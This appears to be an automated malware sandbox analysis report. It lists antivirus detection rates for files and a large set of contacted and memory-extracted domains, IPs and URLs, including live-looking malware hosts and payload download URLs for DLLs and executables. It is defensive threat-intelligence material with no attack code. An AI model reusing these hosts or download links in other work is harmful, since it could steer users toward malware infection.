C:\Program Files (x86)\DataPumpCRT\bin\x86\lame_enc.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libFLAC_dynamic.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libdtsdec.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libmp4v2.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libsox-3.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libsoxr.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libvorbis.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libwebp.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\libwinpthread-1.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\mp3gain.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\opusenc.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\pcm2dsd.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-2N2OT.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-9RJ1O.tmp	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\rg_ebur128.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\sd.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\sqlite3.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\tak_deco_lib.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\takdec.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\uchardet.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\utils.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\bin\x86\wavpackdll.dll (copy)	0%	ReversingLabs
C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe	11%	ReversingLabs	Win32.Adware.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
opposesicknessopw.pw	0%	URL Reputation	safe
politefrightenpowoa.pw	100%	URL Reputation	malware
chincenterblandwka.pw	8%	Virustotal		Browse
host-host-file8.com	20%	Virustotal		Browse
oshi.at	0%	Virustotal		Browse
soupinterestoe.fun	20%	Virustotal		Browse
host-file-host6.com	20%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
http://www.exabot.com/go/robot)Opera/9.80	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://blockchain.infoindex	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
http://tempuri.org/Entity/Id12Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id19Responseok	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24LR	0%	Avira URL Cloud	safe
http://schemas.micro	0%	URL Reputation	safe
https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionSoftware	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/T	100%	Avira URL Cloud	malware
http://tempuri.org/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id12Response	2%	Virustotal		Browse
http://soupinterestoe.fun/6	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
http://192.186.7.211:2001/	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id24LR	2%	Virustotal		Browse
http://tempuri.org/Entity/Id13LR	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	2%	Virustotal		Browse
http://soupinterestoe.fun/f	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/6	12%	Virustotal		Browse
http://www.clocx.netopen	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5LR	0%	Avira URL Cloud	safe
http://192.186.7.211:2001/	5%	Virustotal		Browse
http://www.avantbrowser.com)MOT-V9mm/	0%	Avira URL Cloud	safe
http://tempuri.org/	0%	Virustotal		Browse
http://tempuri.org/Entity/Id13LR	2%	Virustotal		Browse
http://tempuri.org/Entity/Id21Response	4%	Virustotal		Browse
http://tempuri.org/Entity/Id15Response	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/V	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id5LR	2%	Virustotal		Browse
http://soupinterestoe.fun/f	20%	Virustotal		Browse
https://chincenterblandwka.pw/pi	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/d	100%	Avira URL Cloud	malware
https://chincenterblandwka.pw/api	0%	Avira URL Cloud	safe
http://www.innosetup.com/	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id15Response	2%	Virustotal		Browse
https://discord.com	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/	20%	Virustotal		Browse
http://soupinterestoe.fun/apih	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/d	20%	Virustotal		Browse
http://soupinterestoe.fun/apim	100%	Avira URL Cloud	malware
http://www.innosetup.com/	2%	Virustotal		Browse
http://www.geocities.co.jp/SiliconValley-Sunnyvale/4137/	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/apin	100%	Avira URL Cloud	malware
https://chincenterblandwka.pw/api	4%	Virustotal		Browse
http://soupinterestoe.fun/apiw	100%	Avira URL Cloud	malware
http://www.spidersoft.com)	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
http://www.geocities.co.jp/SiliconValley-Sunnyvale/4137/	0%	Virustotal		Browse
https://discord.com	0%	Virustotal		Browse
http://soupinterestoe.fun/apin	16%	Virustotal		Browse
http://https://_bad_pdb_file.pdb	0%	Avira URL Cloud	safe
http://soupinterestoe.fun:80/api	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/apim	16%	Virustotal		Browse
http://tempuri.org/Entity/Id24Response	2%	Virustotal		Browse
http://soupinterestoe.fun/apiK	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/apiw	19%	Virustotal		Browse
http://tempuri.org/Entity/Id14LR	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id6LR	0%	Avira URL Cloud	safe
http://soupinterestoe.fun//	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/apiY	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/BHCNg2	100%	Avira URL Cloud	malware
http://soupinterestoe.fun:80/api	23%	Virustotal		Browse
http://soupinterestoe.fun/apic	100%	Avira URL Cloud	malware
http://soupinterestoe.fun/#	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id5Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id14LR	2%	Virustotal		Browse
http://tempuri.org/Entity/Id10Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id8Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id22LR	0%	Avira URL Cloud	safe
http://soupinterestoe.fun/apiK	16%	Virustotal		Browse
http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dll	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id22Responsey	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id19LR	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id7LR	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id11LR	0%	Avira URL Cloud	safe
http://5.42.64.35/syncUpd.exeSystem32	100%	Avira URL Cloud	malware
http://5.42.66.58/f059ec3d7eb90876/softokn3.dll	100%	Avira URL Cloud	malware
http://5.42.66.58/f059ec3d7eb90876/freebl3.dll	100%	Avira URL Cloud	malware
http://www.clocx.net	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id13Response	0%	Avira URL Cloud	safe
https://chincenterblandwka.pw/=$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s3-w.us-east-1.amazonaws.com	52.217.163.105	true	false		high
bitbucket.org	104.192.141.1	true	false		high
chincenterblandwka.pw	172.67.176.11	true	true	8%, Virustotal, Browse	unknown
api4.ipify.org	173.231.16.77	true	false		high
host-host-file8.com	158.160.130.138	true	true	20%, Virustotal, Browse	unknown
oshi.at	194.15.112.248	true	false	0%, Virustotal, Browse	unknown
soupinterestoe.fun	104.21.24.252	true	true	20%, Virustotal, Browse	unknown
iplogger.com	104.21.76.57	true	false		high
bbuseruploads.s3.amazonaws.com	unknown	unknown	false		high
host-file-host6.com	unknown	unknown	true	20%, Virustotal, Browse	unknown
31.241.2.0.in-addr.arpa	unknown	unknown	true		unknown
opposesicknessopw.pw	unknown	unknown	true	0%, URL Reputation	unknown
api.ipify.org	unknown	unknown	false		high
politefrightenpowoa.pw	unknown	unknown	true	100%, URL Reputation	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://chincenterblandwka.pw/api	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://api.ipify.org/?format=dfg	false		high
http://5.42.66.58/f059ec3d7eb90876/vcruntime140.dll	true	Avira URL Cloud: malware	unknown
http://5.42.66.58/f059ec3d7eb90876/softokn3.dll	true	Avira URL Cloud: malware	unknown
http://5.42.66.58/f059ec3d7eb90876/freebl3.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://aka.ms/odirmr	explorer.exe, 00000001.00000000.1676755416.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id24LR	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/T	5A58.exe, 0000001F.00000003.2298920698.0000000002E19000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://statscreate.orghttp://petas4zb2nd4xmyo2bozkq3g7y2grljlf5sqxwsm5khywam6sierhxad.onionSoftware	31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2521102635.000000000C106000.00000004.00001000.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12Response	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id19Responseok	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000001.00000000.1678371754.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2Response	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://soupinterestoe.fun/6	5A58.exe, 0000001F.00000003.2535337503.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2506452251.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2521389340.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2569945953.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2550720373.0000000000995000.00000004.00000020.00020000.00000000.sdmp	false	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id21Response	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://192.186.7.211:2001/	etopt.exe, 0000001A.00000003.2432495292.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, etopt.exe, 0000001A.00000003.2432796920.0000000000611000.00000004.00000020.00020000.00000000.sdmp	false	5%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id13LR	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://soupinterestoe.fun/f	5A58.exe, 0000001F.00000003.2535337503.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2506452251.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2521389340.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2569945953.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2550720373.0000000000995000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.clocx.netopen	etopt.exe, 0000001A.00000003.2437260066.000000000270C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id5LR	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.avantbrowser.com)MOT-V9mm/	31839b57a4f11171d6abc8bbc4451ee4.exe	false	Avira URL Cloud: safe	low
https://cdn.discordapp.com/attachments/1088058556286251082/1111230812579450950/TsgVtmYNoFT.zipMozill	31839b57a4f11171d6abc8bbc4451ee4.exe	false		high
http://soupinterestoe.fun/	5A58.exe, 0000001F.00000003.2550720373.0000000000995000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id15Response	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://soupinterestoe.fun/V	5A58.exe, 0000001F.00000003.2535337503.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2188694547.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2506452251.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2521389340.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2569945953.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2550720373.0000000000995000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://turnitin.com/robot/crawlerinfo.html)cannot	31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	false		high
http://www.exabot.com/go/robot)Opera/9.80	31839b57a4f11171d6abc8bbc4451ee4.exe	false	URL Reputation: safe	unknown
https://chincenterblandwka.pw/pi	RegAsm.exe, 00000015.00000002.2357230523.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://soupinterestoe.fun/d	5A58.exe, 0000001F.00000003.2298920698.0000000002E19000.00000004.00000020.00020000.00000000.sdmp	false	20%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.innosetup.com/	tuc4.tmp, tuc4.tmp, 00000018.00000000.2054745965.0000000000401000.00000020.00000001.01000000.00000011.sdmp, tuc4.exe, 0000001B.00000003.2077119869.0000000002340000.00000004.00001000.00020000.00000000.sdmp, tuc4.exe, 0000001B.00000003.2078602095.0000000002088000.00000004.00001000.00020000.00000000.sdmp, tuc4.tmp, 0000001D.00000002.3178968122.0000000000401000.00000020.00000001.01000000.00000017.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://wns.windows.com/L	explorer.exe, 00000001.00000000.1680428061.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		high
https://api.ip.sb/ip	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://discord.com	dialer.exe, 00000022.00000003.2678850470.000001B8F610B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://soupinterestoe.fun/apih	5A58.exe, 0000001F.00000003.2400302889.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2353734264.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2336451354.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2376601743.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2455927272.0000000002E18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.google.com/bot.html)crypto/ecdh:	31839b57a4f11171d6abc8bbc4451ee4.exe	false		high
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000001.00000000.1676755416.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/apim	5A58.exe, 0000001F.00000003.2209669207.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.geocities.co.jp/SiliconValley-Sunnyvale/4137/	etopt.exe, 0000001A.00000003.2459000847.0000000002708000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://soupinterestoe.fun/apin	5A58.exe, 0000001F.00000003.2506452251.0000000000995000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/apiw	5A58.exe, 0000001F.00000003.2550720373.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2535337503.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	false	19%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.spidersoft.com)	31839b57a4f11171d6abc8bbc4451ee4.exe	false	Avira URL Cloud: safe	low
http://tempuri.org/Entity/Id24Response	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	nsi4BEF.tmp.exe, 0000001E.00000003.2313760713.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2612320278.000001B8F6B92000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://apis.juhe.cn/ip/Example/query.phpclient	etopt.exe, 0000001A.00000002.2796162380.0000000004E69000.00000002.00001000.00020000.00000000.sdmp, etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://https://_bad_pdb_file.pdb	31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.0000000003D8B000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.000000000349C000.00000040.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://soupinterestoe.fun:80/api	5A58.exe, 0000001F.00000003.2312968787.0000000002EAE000.00000004.00000020.00020000.00000000.sdmp	false	23%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://dc.services.visualstudio.com/v2/trackVDequeueAndSend:	907.exe, 00000006.00000002.1919407201.00000000044A1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/5xx-error-landing	5A58.exe, 0000001F.00000003.2535337503.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2506452251.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2521389340.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2569945953.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2550720373.0000000000995000.00000004.00000020.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/apiK	5A58.exe, 0000001F.00000003.2400302889.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2455927272.0000000002E18000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id14LR	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id6LR	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_Error	etopt.exe, etopt.exe, 00000016.00000002.2053481217.000000000040A000.00000008.00000001.01000000.00000010.sdmp, etopt.exe, 0000001A.00000002.2733876290.000000000040A000.00000004.00000001.01000000.00000010.sdmp, etopt.exe, 0000001A.00000000.2063286375.000000000040A000.00000008.00000001.01000000.00000010.sdmp, etopt.exe, 0000001A.00000003.2731758306.000000000061C000.00000004.00000020.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/apiH	5A58.exe, 0000001F.00000003.2400302889.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2376601743.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.google.com/feedfetcher.html)HKLM	31839b57a4f11171d6abc8bbc4451ee4.exe, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000003.2047877802.00000000036C0000.00000004.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2430493808.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, 31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	false		high
http://soupinterestoe.fun//	5A58.exe, 0000001F.00000003.2535337503.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2506452251.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2521389340.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2569945953.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2550720373.0000000000995000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://blockchain.infoindex	31839b57a4f11171d6abc8bbc4451ee4.exe, 0000000F.00000002.2342467116.0000000000400000.00000040.00000001.01000000.0000000C.sdmp	false	URL Reputation: safe	unknown
http://soupinterestoe.fun/apiY	5A58.exe, 0000001F.00000003.2455927272.0000000002E18000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://soupinterestoe.fun/BHCNg2	5A58.exe, 0000001F.00000003.2535337503.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2506452251.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2521389340.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2569945953.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2550720373.0000000000995000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://outlook.com_	explorer.exe, 00000001.00000000.1680428061.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	low
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	5A58.exe, 0000001F.00000003.2483484906.0000000002EC9000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000022.00000003.2629212055.000001B8F6B7B000.00000004.00000020.00020000.00000000.sdmp	false		high
http://soupinterestoe.fun/apic	5A58.exe, 0000001F.00000003.2506452251.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://soupinterestoe.fun/#	5A58.exe, 0000001F.00000003.2535337503.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2506452251.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2521389340.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2569945953.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5A58.exe, 0000001F.00000003.2550720373.0000000000995000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.alexa.com/help/webmasters;	31839b57a4f11171d6abc8bbc4451ee4.exe	false		high
http://tempuri.org/Entity/Id5Response	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false		high
